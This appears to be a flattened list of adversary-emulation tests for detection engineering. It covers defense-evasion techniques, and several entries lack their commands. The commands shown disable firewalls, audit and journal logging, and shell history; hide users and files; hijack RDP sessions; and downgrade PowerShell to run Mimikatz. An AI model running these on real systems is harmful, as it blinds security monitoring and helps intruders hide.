if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi history -c ls -la $HISTFILE ls -la ~/.bash_logout if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi unset HISTIGNORE if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi history -c whoami groups if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
Description: An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
Cleanup:
unset HISTIGNORE
T1562.003 - Impair Defenses: Impair Command History Logging
Disable Windows Command Line Auditing using reg.exe
Description: In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
Description: In Windows operating systems, command line auditing is controlled through the following registry value:
Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Registry Value: ProcessCreationIncludeCmdLine_Enabled
When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
Registry events (Windows Event ID 4657, Sysmon Event ID 13)
Read more here:
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Disable Microsoft Defender Firewall
netsh advfirewall set currentprofile state off
Description: Disables the Microsoft Defender Firewall for the current profile.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
Cleanup:
netsh advfirewall set currentprofile state on >nul 2>&1
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Description: Disables the Microsoft Defender Firewall for the public profile via registry
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Allow SMB and RDP on Microsoft Defender Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
Description: Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
Cleanup:
netsh advfirewall reset >nul 2>&1
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Description: This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start UFW firewall
ufw disable
Description: Stop the Uncomplicated Firewall (UFW) if installed.
Prereq: Check if ufw is installed on the machine.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
ufw enable ufw status verbose
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start Packet Filter
service pf stop service pf disable
Description: Stop the Packet Filter if installed.
Prereq: Check if pfctl is installed on the machine.
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
Cleanup:
service pf enable service pf start service pf status
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Stop/Start UFW firewall systemctl
systemctl stop ufw
Description: Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
Prereq: Check if systemctl and ufw is installed on the machine.
if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
systemctl start ufw systemctl status ufw
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Turn off UFW logging
ufw logging off
Description: Turn off the Uncomplicated Firewall (UFW) logging.
Prereq: Check if ufw is installed on the machine and enabled.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
Cleanup:
ufw logging low ufw status verbose
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Add and delete UFW firewall rules
ufw prepend deny from 1.2.3.4 ufw status numbered
Description: Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled.
Prereq: Check if ufw is installed on the machine and enabled.
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Add and delete Packet Filter rules
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f - pfctl -a pf-rules -s rules
Description: Add and delete a rule on the Packet Filter (PF) if installed and enabled.
Prereq: Check if pf is installed on the machine and enabled.
if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi
Cleanup:
pfctl -a pf-rules -F rules sed -i "" '/anchor pf-rules/d' pfctl -f /etc/pf.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall user.rules file
echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules grep "# THIS IS A COMMENT" /etc/ufw/user.rules
Description: Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
Prereq: Check if /etc/ufw/user.rules exists.
if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall ufw.conf file
echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf
Description: Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
which controls if the firewall starts on boot and its logging level.
Prereq: Check if /etc/ufw/ufw.conf exists.
if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf cat /etc/ufw/ufw.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall sysctl.conf file
echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf
Description: Edit the Uncomplicated Firewall (UFW) configuration file for setting network
variables /etc/ufw/sysctl.conf.
Prereq: Check if /etc/ufw/sysctl.conf exists.
if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf cat /etc/ufw/sysctl.conf
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Edit UFW firewall main configuration file
echo "# THIS IS A COMMENT" >> /etc/default/ufw grep "# THIS IS A COMMENT" /etc/default/ufw
Description: Edit the Uncomplicated Firewall (UFW) main configuration file for setting
default policies /etc/default/ufw.
Prereq: Check if /etc/default/ufw exists.
if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
Cleanup:
sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Tail the UFW firewall log file
tail /var/log/ufw.log
Description: Print the last 10 lines of the Uncomplicated Firewall (UFW) log file
/var/log/ufw.log.
Prereq: Check if /var/log/ufw.log exists.
if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Disable iptables
iptables-save > /tmp/iptables.rules iptables -F
Description: Some Linux systems may not activate ufw, but use iptables for firewall rules instead. (ufw works on top of iptables.)
Attackers cannot directly disable iptables, as it is not implemented as a service like ufw. But they can flush all iptables
rules, which in fact "disable" iptables.
Prereq: Check if iptables is installed on the machine.
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
Cleanup:
iptables-restore < /tmp/iptables.rules
T1562.004 - Impair Defenses: Disable or Modify System Firewall
Modify/delete iptables firewall rules
iptables -D OUTPUT -p tcp --dport 21 -j DROP
Description: Instead of completely "disabling" iptables, adversaries may choose to delete a certain rule, which, for example, blocks data exfiltration via ftp.
By doing so, they may cause less noise to avoid detection.
Prereq: Check if iptables is installed on the machine.
if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi if ! echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo -e "\n***** this firewall rule is NOT activated *****\n***** activate it by executing \"iptables -A OUTPUT -p tcp --dport 21 -j DROP\" *****\n"; exit 1; fi
Cleanup:
iptables-restore < /tmp/iptables.rules
T1562.004 - Impair Defenses: Disable or Modify System Firewall
LockBit Black - Unusual Windows firewall registry modification -cmd
sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf if [ -f "/etc/auditd.conf" ]; then sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf else sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf fi sed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf
Description: Emulates modification of auditd configuration files
Cleanup:
sed -i '$ d' /etc/audisp/audispd.conf if [ -f "/etc/auditd.conf" ]; then sed -i '$ d' /etc/auditd.conf else sed -i '$ d' /etc/audit/auditd.conf fi sed -i '$ d' /etc/libaudit.conf
Description: Emulates modification of auditd configuration files
Cleanup:
sed -i "" '/#art_test_1562_006_1/d' /etc/security/audit_event
T1562.006 - Impair Defenses: Indicator Blocking
Logging Configuration Changes on Linux Host
if [ -f "/etc/syslog.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf fi if [ -f "/etc/rsyslog.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf fi if [ -f "/etc/syslog-ng/syslog-ng.conf" ]; then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf fi
Description: Emulates modification of syslog configuration.
Cleanup:
if [ -f "/etc/syslog.conf" ]; then sed -i '$ d' /etc/syslog.conf fi if [ -f "/etc/rsyslog.conf" ]; then sed -i '$ d' /etc/rsyslog.conf fi if [ -f "/etc/syslog-ng/syslog-ng.conf" ]; then sed -i '$ d' /etc/syslog-ng/syslog-ng.conf fi
T1562.006 - Impair Defenses: Indicator Blocking
Logging Configuration Changes on FreeBSD Host
if [ -f "/etc/syslog.conf" ]; then echo '#art_test_1562_006_2' >> /etc/syslog.conf fi
Description: Emulates modification of syslog configuration.
Cleanup:
if [ -f "/etc/syslog.conf" ]; then sed -i "" '/#art_test_1562_006_2/d' /etc/syslog.conf fi
Description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
Prereq: PSExec must be installed on the machine.
if (Test-Path "..\ExternalPayloads\pstools\PsExec.exe") {exit 0} else {exit 1}
Description: An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Description: An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
Description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" Clear-DnsClientCache
Description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
Cleanup:
try { # Get all current NRPT rules $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule foreach ($rule in $DnsClientNrptRules) { Remove-DnsClientNrptRule -Name $rule.Name -Force }
# Clear DNS client cache Clear-DnsClientCache Write-Host "All NRPT rules have been removed and the DNS cache has been cleared." }
Description: Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
Description: You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Description: Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
Description: This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
Description: This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
aws logs create-log-group --log-group-name log-test --region us-east-1 --output json echo "*** Log Group Created ***" aws logs delete-log-group --log-group-name log-test --region us-east-1 --output json echo "*** Log Group Deleted ***"
Description: Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
Description: Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by
deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
Description: Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Description: GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied.
An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted.
This Atomic attempts to delete the Activity Event log. An event is generated under the method name of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
T1562.009 - Impair Defenses: Safe Boot Mode
Safe Mode Boot
bcdedit /set safeboot network
Description: Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot
Cleanup:
bcdedit /deletevalue {current} safeboot
T1562.010 - Impair Defenses: Downgrade Attack
ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
Description: An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
Prereq: Check if VMWARE PowerCLI PowerShell Module is installed.
Description: An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1562.010 - Impair Defenses: Downgrade Attack
PowerShell Version 2 Downgrade
PowerShell -version 2 -command 'Invoke-Mimikatz'
Description: Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
Delete all auditd rules using auditctl
auditctl -D
Description: Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs.
Prereq: Check if auditd is installed.
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
Cleanup:
service auditd restart
T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
Disable auditd using auditctl
auditctl -e 0
Description: The command `auditctl -e 0` disables the audit system. By setting the parameter to `0`, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact security monitoring and compliance efforts.
Prereq: Check if auditd is installed.
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
Description: The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
Description: The atomic test disables the journal logging using built-in systemctl utility
Cleanup:
sudo systemctl start systemd-journald #starts journal service sudo systemctl enable systemd-journald #starts journal service automatically at boot time
T1562 - Impair Defenses
Disable journal logging via sed utility
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
Description: The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
Cleanup:
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data sudo systemctl restart systemd-journald #restart the journal service
T1563.002 - Remote Service Session Hijacking: RDP Hijacking
RDP hijacking
query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" net start sesshijack
Description: [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
Cleanup:
sc.exe delete sesshijack >nul 2>&1
T1564.001 - Hide Artifacts: Hidden Files and Directories
T1564.001 - Hide Artifacts: Hidden Files and Directories
Create Windows System File with Attrib
attrib.exe +s %temp%\T1564.001.txt
Description: Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
and observe that the Attributes are "SA" for System and Archive.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001.txt)
T1564.001 - Hide Artifacts: Hidden Files and Directories
Create Windows Hidden File with Attrib
attrib.exe +h %temp%\T1564.001.txt
Description: Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes are "SH" for System and Hidden.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001.txt)
Description: Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
Description: Creates a file and marks it as hidden through powershell. Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "H" Hidden.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001-9.txt)
Description: Creates a file and marks it as System through powershell. Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "S" System.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001-10.txt)
Description: Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
Cleanup:
sudo dscl . -delete /Users/APT
T1564.002 - Hide Artifacts: Hidden Users
Create Hidden User using IsHidden option
sudo dscl . -create /Users/APT IsHidden 1
Description: Add a hidden user on macOS using IsHidden optoin
Cleanup:
sudo dscl . -delete /Users/APT
T1564.002 - Hide Artifacts: Hidden Users
Create Hidden User in Registry
NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0
Description: Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.
Reference https://attack.mitre.org/techniques/T1564/002/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Cleanup:
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /f >nul 2>&1 net user ${user_name}$ /delete >nul 2>&1
Description: Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
Upon execution a hidden PowerShell window will launch calc.exe
Description: The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
The default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view.
Reference: https://cert.gov.ua/article/5702579
Cleanup:
taskkill /im chrome /f
T1564.003 - Hide Artifacts: Hidden Window
Hidden Window-Conhost Execution
conhost.exe --headless calc.exe
Description: Launch conhost.exe in "headless" mode, it means that no visible window will pop up on the victim's machine.
This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
conhost.exe can be used as proxy the execution of arbitrary commands
Description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
echo cmd /c echo "Shell code execution."> %temp%\T1564.004_has_ads_cmd.txt:adstest.txt for /f "usebackq delims=?" %i in (%temp%\T1564.004_has_ads_cmd.txt:adstest.txt) do %i
Description: Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt"
Description: Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
Prereq: The file must exist on disk at specified location ($env:TEMP\T1564.004_has_ads_powershell.txt)
md %temp%\...$.......::$index_allocation echo too many secrets > %temp%\...$.......::$index_allocation\secrets.txt
Description: Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
Description: Create a simple VirtualBox VM and start up the machine
Cleanup command stops and deletes the newly created VM and associated files
https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://attack.mitre.org/techniques/T1564/006/
Prereq: VirtualBox must exist on disk at specified locations (C:\Program Files\Oracle\VirtualBox\VirtualBox.exe)
if (Test-Path "C:\Program Files\Oracle\VirtualBox\VirtualBox.exe") {exit 0} else {exit 1}
Prereq: VBoxManage must exist on disk at specified locations (C:\Program Files\Oracle\VirtualBox\VBoxManage.exe)
if (Test-Path "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe") {exit 0} else {exit 1}
Description: Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
Cleanup command stops and deletes the newly created VM
https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
https://attack.mitre.org/techniques/T1564/006/
Prereq: Hyper-V must be enabled on the system Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart
Description: This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
Prereq: ExchangeOnlineManagement module must be installed.
Description: This module extracts a binary (calc.exe) from inside of another binary.
In the wild maldoc authors will use this technique to hide binaries inside of files stored
within the office document itself. An example of this technique can be seen in sample
f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.
